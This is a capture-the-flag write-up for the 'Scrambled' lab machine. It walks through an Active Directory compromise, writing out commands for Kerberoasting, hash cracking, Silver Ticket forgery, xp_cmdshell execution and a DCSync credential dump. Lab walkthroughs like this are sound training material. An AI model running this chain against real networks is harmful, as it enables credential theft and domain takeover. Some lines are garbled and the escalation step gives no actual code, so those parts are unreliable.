Scrambled
IP: 10.10.11.168 | Domain: scrm.local | DC: dc1.scrm.local
Environment Setup
export IP=10.10.11.168
export VPN=$(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1)
echo "10.10.11.168 scrm.local dc1.scrm.local" >> /etc/hosts
Step 1 — Port Scanning
Why: NTLM authentication is disabled on this machine — a rare but increasingly recommended hardening step. This forces all authentication through Kerberos and eliminates password-spraying via NTLM. All tooling must switch to Kerberos mode, which complicates the attack chain significantly.
nmap -sCV -p- --min-rate 5000 $IP -oN nmap.out
Output:
PORT STATE SERVICE
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
4411/tcp open found on some ports
5985/tcp open wsman
Key findings:
- MSSQL (1433) open alongside AD ports — SQL Server on a DC is a significant attack vector
- HTTP (80) — potential user enumeration or credential hints
- NTLM disabled — confirmed from web notice, all auth must be Kerberos
Step 2 — Web Enumeration → Username Discovery
Why: The web server hosts an intranet page announcing that NTLM auth is disabled. More critically, a password reset notice reveals a username in plaintext. Combined with Kerberos user enumeration, this gives the first foothold.
curl http://$IP/
# Enumerate web pages for usernames and password reset instructions
Key findings:
- Web page reveals: user
ksimpsonhad their password reset to their username - Classic helpdesk misconfiguration — temporary password equals username, never changed
Step 3 — Kerberos Authentication as ksimpson
Why: With NTLM disabled, all auth goes through Kerberos. ksimpson:ksimpson is the credential hint from the web page. Kerberos TGT request confirms validity without making noisy NTLM attempts.
getTGT.py scrm.local/ksimpson:ksimpson -dc-ip $IP
export KRB5CCNAME=ksimpson.ccache
Key findings:
ksimpson:ksimpsonvalid — TGT obtained- Kerberos-only environment means all tools need
-k -no-passflags
Step 4 — Kerberoasting
Why: Any authenticated domain user can request TGS tickets for SPNs. The ticket is encrypted with the service account's hash — making it offline-crackable. In a Kerberos-only environment, impacket's GetUserSPNs.py must use the existing TGT.
GetUserSPNs.py -k -no-pass scrm.local/ksimpson -dc-host dc1.scrm.local -request
Output:
ServicePrincipalName Name MemberOf
----------------------------- --------- --------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$...*<REDACTED_HASH>
Key findings:
sqlsvcservice account is Kerberoastable — SPN:MSSQLSvc/dc1.scrm.local:1433- RC4-HMAC hash (type 23) — fast to crack with hashcat
Step 5 — Hash Cracking
Why: RC4-HMAC TGS-REP hashes (mode 13100) are among the fastest Kerberos hash types. Rockyou catches common service account passwords immediately.
hashcat -m 13100 sqlsvc.hash /usr/share/wordlists/rockyou.txt
Output:
$krb5tgs$23$*sqlsvc$...*<REDACTED_HASH>:<REDACTED>
Key findings:
sqlsvc:<REDACTED>cracked — service account password recovered
Step 6 — Silver Ticket — MSSQL Access
Why: With the sqlsvc NTLM hash (derived from the cracked password), a Silver Ticket can be forged for MSSQLSvc/dc1.scrm.local:1433. Silver Tickets bypass the KDC entirely — no TGT request logged. The ticket grants direct service access as any user, including Administrator.
# Get sqlsvc NTLM hash from password
python3 -c "import hashlib; print(hashlib.new('md4', '<REDACTED>'.encode('utf-16le')).hexdigest())"
# Forge Silver Ticket
ticketer.py -nthash <REDACTED_NTLM> -domain-sid <DOMAIN_SID> -domain scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 Administrator
export KRB5CCNAME=Administrator.ccache
# Connect to MSSQL
mssqlclient.py -k dc1.scrm.local
Key findings:
- Silver Ticket forged as Administrator for MSSQL service
- Direct MSSQL access without touching the KDC — no authentication logs on DC
xp_cmdshelllikely available for code execution
Step 7 — MSSQL Code Execution → Shell
Why: xp_cmdshell in MSSQL runs OS commands as the SQL service account. Even if disabled, it can be re-enabled with sp_configure when running as a privileged SQL user. This gives command execution on the DC.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
Output:
scrm\sqlsvc
Key findings:
- RCE as
scrm\sqlsvcvia MSSQL - Upload reverse shell or Certify/Rubeus for next step
Step 8 — Privilege Escalation via MSSQL CLR Assembly
Why: MSSQL CLR (Common Language Runtime) assemblies allow loading custom .NET DLLs directly into SQL Server and executing them as the service account. The sqlsvc account has SeImpersonatePrivilege which combined with CLR gives SYSTEM-level access.
-- Load CLR assembly for OS command execution as SYSTEM
-- Escalate to NT AUTHORITY\SYSTEM via token impersonation
Key findings:
SeImpersonatePrivilegeabused via MSSQL CLR → SYSTEM shell on DC- Dump NTDS or run DCSync for Domain Admin hash
Step 9 — DCSync → Domain Admin
Why: With SYSTEM on the DC, extracting the NTDS.dit or performing a DCSync gives every domain account hash. Pass-the-hash with the Administrator NTLM completes the compromise.
secretsdump.py -k -no-pass scrm.local/Administrator@dc1.scrm.local
Output:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED_NTLM>:::
Key findings:
- Administrator NTLM hash extracted
- Pass-the-hash not possible (NTLM disabled) — use the hash with Silver Ticket or crack for plaintext
🏴 MACHINE PWNED — DOMAIN ADMIN ACHIEVED
Credentials
ksimpson:<REDACTED> # Username = password (web hint)
sqlsvc:<REDACTED> # Kerberoast → hashcat
Administrator:<REDACTED> # DCSync NTLM hash
Full Attack Chain
Web enumeration → ksimpson:ksimpson (password reset hint)
└─ Kerberoast (Kerberos-only) → sqlsvc TGS hash
└─ hashcat (rockyou) → sqlsvc:<REDACTED>
└─ Silver Ticket (MSSQLSvc) → MSSQL as Administrator
└─ xp_cmdshell → RCE as sqlsvc
└─ CLR assembly + SeImpersonatePrivilege → SYSTEM
└─ DCSync → Administrator NTLM hash
🏴 DOMAIN ADMIN
© 0xNRG — Scrambled pwned